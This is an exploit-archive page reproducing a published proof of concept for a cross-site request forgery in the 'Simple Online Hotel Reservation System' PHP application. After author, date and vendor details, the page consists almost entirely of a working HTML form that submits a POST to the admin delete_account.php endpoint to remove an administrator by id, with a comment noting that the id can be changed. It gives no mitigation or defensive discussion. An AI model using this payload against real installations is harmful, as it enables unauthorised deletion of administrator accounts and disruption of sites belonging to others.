simple online hotel reservation system crosssite request forgery (delete admin)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 25, 2019 # Vendor Homepage: https://code-projects.org/ # Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Delete Admin</title> </head> <body> <form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1"> <!-- You can change admin_id --> <button>Delete</button> </form> </body> </html>
Simple online hotel reservation system crosssite request forgery (delete admin) Vulnerability / Exploit Source : Simple online hotel reservation system crosssite request forgery (delete admin)